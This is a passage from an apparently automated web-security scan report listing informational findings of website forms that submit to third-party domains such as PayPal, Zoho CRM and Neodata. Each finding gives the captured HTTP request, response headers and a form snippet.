  • udename!survey1876072
  • udename!tkt_email
  • udename!survey1876073
  • udename!survey1876073
  • udename!survey1876073
  • udename!survey1876073
  • udename!survey1876073
  • udename!subject
  • udename!survey1876074
  • udename!survey1876074
  • udename!survey1876074
  • udename!survey1876074
  • Submit

Request

GET /x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:29 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=38C713FCEE18F8B0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.238.1295885069167883; path=/; expires=Sat, 03-Jan-15 16:04:29 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=4203274250.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...
<div id="feedbackModalModal" class="atx-modal-content" style="display: none">

<form method="POST" id="message" name="message" class="user-form"
action="http://server.iad.liveperson.net/hc/s-86335200/web/ticketpub/msgController.jsp"
enctype="multipart/form-data" onsubmit="return validateFeedback('message')">


<div class="column-group feedback clearfix">
...[SNIP]...

19.9. http://www.barelyfitz.com/projects/tabber/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barelyfitz.com
Path:   /projects/tabber/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • business
  • item_name
  • item_number
  • image_url
  • no_shipping
  • cn
  • currency_code
  • tax
  • submit

Request

GET /projects/tabber/ HTTP/1.1
Host: www.barelyfitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:24:24 GMT
Server: Apache
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html
Content-Length: 14750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML LANG="en">
<HEAD>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859
...[SNIP]...
<DIV STYLE="padding:4px;background:#ccd">
Support future development!

<form action="https://www.paypal.com/cgi-bin/webscr" method="post" style="text-align:center;margin:0px;padding:0px;">
<input type="hidden" name="cmd" value="_xclick">
...[SNIP]...

19.10. http://www.cloudaccess.net/contact-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /contact-us.html

Issue detail

The page contains a form which POSTs data to the domain cloudaccess.infusionsoft.com. The form contains the following fields:
  • infusion_xid
  • infusion_type
  • infusion_name
  • Contact0FirstName
  • Contact0LastName
  • Contact0Company
  • Contact0Email
  • Contact0Phone1
  • captcha.typed
  • Submit

Request

GET /contact-us.html HTTP/1.1
Host: www.cloudaccess.net
Proxy-Connection: keep-alive
Referer: http://www.cloudaccess.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:43 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:42 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Last-Modified: Tue, 02 Nov 2010 20:37:37 GMT
Expires: Mon, 24 Jan 2011 14:07:43 GMT
X-Content-Encoded-By: Joomla! 1.5
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...
<br /><form action="https://cloudaccess.infusionsoft.com/AddForms/processFormSecure.jsp" method="POST"> <input id="infusion_xid" name="infusion_xid" value="07790255c5da0d4862bc665da13da522" type="hidden" />
...[SNIP]...

19.11. http://www.elmundo.es/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elmundo.es
Path:   /

Issue detail

The page contains a form which POSTs data to the domain buscador.elmundo.es. The form contains the following fields:
  • donde
  • donde
  • cadena
  • Submit

Request

GET / HTTP/1.1
Host: www.elmundo.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Date: Tue, 25 Jan 2011 05:05:15 GMT
Content-Type: text/html
Connection: close
Cache-Control: no-cache
X-Accel-Cache-Control: no-cache
Set-Cookie: ELMUNDO_idusr=TT5aC8CoFBUAAB8okbI-c2f1049e2d4516c17b18641aef04f3d5; expires=Fri, 24 Jan 2014 05:05:15 GMT; path=/; domain=.elmundo.es
Content-Length: 148754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<li id="nav_busqueda">
<form action="http://buscador.elmundo.es/perl/busca-generico.html" method="post">
<label>
...[SNIP]...

19.12. http://www.espatial.com/contact/live-trial-adwords

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.espatial.com
Path:   /contact/live-trial-adwords

Issue detail

The page contains a form which POSTs data to the domain crm.zoho.com. The form contains the following fields:
  • xnQsjsdp
  • xmIwtLD
  • actionType
  • returnURL
  • First Name
  • Last Name
  • Email
  • Company
  • Country
  • Lead Source
  • Lead Status
  • input
  • LEADCF16
  • LEADCF18
  • LEADCF19
  • LEADCF20
  • LEADCF23

Request

GET /contact/live-trial-adwords HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:24 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31392

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification"
...[SNIP]...
</p>
<form name="zohoForm" action="https://crm.zoho.com/crm/WebToLeadForm" onSubmit='return validate2();' accept-charset="UTF-8" method="POST">
<input name="xnQsjsdp" type="hidden" value="889WVNek9JY$/" />
...[SNIP]...

19.13. http://www.freebsdfoundation.org/donate/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsdfoundation.org
Path:   /donate/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • business
  • item_name
  • no_shipping
  • cn
  • return
  • cancel_return
  • currency_code
  • tax
  • bn
  • submit

Request

GET /donate/ HTTP/1.1
Host: www.freebsdfoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:40 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 10624

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-
...[SNIP]...
<br />

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p>
...[SNIP]...

19.14. http://www.hashemian.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hashemian.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain rover.ebay.com. The form contains the following fields:
  • MfcISAPICommand
  • ht
  • SortProperty
  • ebaytag1
  • query
  • submit
  • ebaytag1

Request

GET / HTTP/1.1
Host: www.hashemian.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:53 GMT
Server: Apache/2.2.15
Vary: Host
Accept-Ranges: bytes
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25523

<html>
<head>
<title>Free Web Tools, Financial Markets Book, Financial Blog, Hashemian</title>
<meta name="description" content="Free Web Tools, the book Financial Markets For The Rest Of Us. Lates
...[SNIP]...
<br /><form action="http://rover.ebay.com/rover/1/711-53200-19255-42/1?mpt=1295914319&campid=5335822959&a3h=1&u7v=1&n3y=1&toolid=56011&z5m=1&x6n=1&k4v=1&customid=search&l3s=1&v1e=1&y6d=1&b4x=1&def=a3h&m9q=1&p9m=1&pns=01&" method="post" name="ebaysearch">
<input name="MfcISAPICommand" value="GetResult" type="hidden">
...[SNIP]...

19.15. http://www.hashemian.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hashemian.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • business
  • item_name
  • no_shipping
  • no_note
  • currency_code
  • tax
  • bn
  • submit

Request

GET / HTTP/1.1
Host: www.hashemian.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:53 GMT
Server: Apache/2.2.15
Vary: Host
Accept-Ranges: bytes
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25523

<html>
<head>
<title>Free Web Tools, Financial Markets Book, Financial Blog, Hashemian</title>
<meta name="description" content="Free Web Tools, the book Financial Markets For The Rest Of Us. Lates
...[SNIP]...
<td align="center" valign="middle">
<form name="hashemian1paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<font size="-2" color="navy">
...[SNIP]...

19.16. http://www.huddletogether.com/projects/lightbox2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /projects/lightbox2/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • business
  • no_note
  • currency_code
  • tax
  • bn
  • submit

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:07 GMT
Server: Apache
Last-Modified: Wed, 10 Mar 2010 20:38:11 GMT
ETag: "a0be022-3006-4817846d0f2c0"
Accept-Ranges: bytes
Content-Length: 12294
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   
   <title>Lightbox 2<
...[SNIP]...
</p>
   <form action="https://www.paypal.com/cgi-bin/webscr" method="post">
       <fieldset>
...[SNIP]...

19.17. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomlacommunity.eu
Path:   /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • business
  • item_name
  • no_shipping
  • no_note
  • currency_code
  • amount
  • submit

Request

GET /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html HTTP/1.1
Host: www.joomlacommunity.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2b89666f144681ba17ab9a0996f50e0=fc830a5138c7cd5b8f7f3fa60df9a70c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="http://www.jo
...[SNIP]...
<div class="moduletablemoduletable-doneer">
                   <form action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="hidden" name="cmd" value="_donations"/>
...[SNIP]...

19.18. http://www.jt.gen.tr/makaleler/46-joomla-16.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jt.gen.tr
Path:   /makaleler/46-joomla-16.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • encrypted
  • submit

Request

GET /makaleler/46-joomla-16.html HTTP/1.1
Host: www.jt.gen.tr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 619eb53f4a8cd392a6fe48a16c891436=63427cbf922f139568c46da3ddcb18be; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-tr" lang="tr-tr" >
<he
...[SNIP]...
<div align="center">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

19.19. http://www.littlewebthings.com/projects/countdown/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.littlewebthings.com
Path:   /projects/countdown/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • encrypted
  • submit

Request

GET /projects/countdown/ HTTP/1.1
Host: www.littlewebthings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13208
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <l
...[SNIP]...
<div class="donation_link">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

19.20. http://www.littlewebthings.com/projects/countdown/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.littlewebthings.com
Path:   /projects/countdown/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • encrypted
  • submit

Request

GET /projects/countdown/ HTTP/1.1
Host: www.littlewebthings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13208
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <l
...[SNIP]...
<div class="donation_link">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

19.21. http://www.littlewebthings.com/projects/countdown/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.littlewebthings.com
Path:   /projects/countdown/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • encrypted
  • submit

Request

GET /projects/countdown/ HTTP/1.1
Host: www.littlewebthings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13208
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <l
...[SNIP]...
<div class="donation_link">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

19.22. http://www.netlingo.com/advertise/payments.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /advertise/payments.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • submit
  • encrypted

Request

GET /advertise/payments.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</h2>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post"> <input name="cmd" type="hidden" value="_s-xclick" />
...[SNIP]...

19.23. http://www.ossp.org/pkg/tool/lmtp2nntp/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ossp.org
Path:   /pkg/tool/lmtp2nntp/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • business
  • item_name
  • item_number
  • no_shipping
  • cn
  • submit

Request

GET /pkg/tool/lmtp2nntp/ HTTP/1.1
Host: www.ossp.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:46 GMT
Server: Apache/2.2.8 (OpenPKG/CURRENT)
Last-Modified: Mon, 31 Mar 2008 22:42:38 GMT
ETag: "60600e-8281-449c35e657380"
Accept-Ranges: bytes
Content-Length: 33409
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="ICON" href="../../../SHARE/ossp_img/ossp-icon.ico">
<link rel="SHORTCUT ICON" href="../../../SHARE/ossp_img/o
...[SNIP]...
<td align="right" valign="top">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_xclick">
...[SNIP]...

19.24. http://www.outdoorphotographer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoorphotographer.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.neodata.com. The form contains the following fields:
  • Magazine
  • ItemCode
  • SourceCode
  • OrderType
  • iResponse
  • FullName
  • StreetAdr
  • SuppAdr
  • City
  • State
  • PostalCode
  • EmailAdr
  • submit

Request

GET / HTTP/1.1
Host: www.outdoorphotographer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:22 GMT
Server: Apache
Set-Cookie: 712027b123d61fc48aa279ef791369c4=23b27b102f5b9ec9a6db3d7427c77e90; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</div>
<form action="https://www.neodata.com/ITPS2.cgi" method="post" id="subscribe_form" target="_blank">
<input type="hidden" name="Magazine" value="Outdoor Photographer" />
...[SNIP]...

19.25. http://www.outdoorphotographer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoorphotographer.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.neodata.com. The form contains the following fields:
  • Magazine
  • ItemCode
  • SourceCode
  • OrderType
  • iResponse
  • FullName
  • StreetAdr
  • SuppAdr
  • City
  • State
  • PostalCode
  • EmailAdr
  • submit

Request

GET / HTTP/1.1
Host: www.outdoorphotographer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:22 GMT
Server: Apache
Set-Cookie: 712027b123d61fc48aa279ef791369c4=23b27b102f5b9ec9a6db3d7427c77e90; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<td align="center"><form action="https://www.neodata.com/ITPS2.cgi" method="post" name="subscribe_form" target="form_results" id="subscribe_form">
<input type="hidden" name="Magazine" value="Outdoor Photographer" />
...[SNIP]...

19.26. http://www.outdoorphotographer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoorphotographer.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.neodata.com. The form contains the following fields:
  • Magazine
  • ItemCode
  • SourceCode
  • OrderType
  • iResponse
  • FullName
  • StreetAdr
  • SuppAdr
  • City
  • State
  • PostalCode
  • EmailAdr
  • submit

Request

GET / HTTP/1.1
Host: www.outdoorphotographer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:22 GMT
Server: Apache
Set-Cookie: 712027b123d61fc48aa279ef791369c4=23b27b102f5b9ec9a6db3d7427c77e90; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</div>
<form action="https://www.neodata.com/ITPS2.cgi" method="post" id="subscribe_form" target="_blank">
<input type="hidden" name="Magazine" value="Outdoor Photographer" />
...[SNIP]...

19.27. http://www.playshakespeare.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playshakespeare.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • hosted_button_id
  • submit

Request

GET / HTTP/1.1
Host: www.playshakespeare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: eab80364d83027bfc601e73262603d25=341187f485832c9a1355235ffc880801; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 180908

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns=
...[SNIP]...
</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick"/>
...[SNIP]...

19.28. http://www.sailinganarchy.com/advertise.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /advertise.htm

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • business
  • item_name
  • item_number
  • no_shipping
  • return
  • cancel_return
  • no_note
  • currency_code
  • lc
  • bn
  • submit

Request

GET /advertise.htm HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
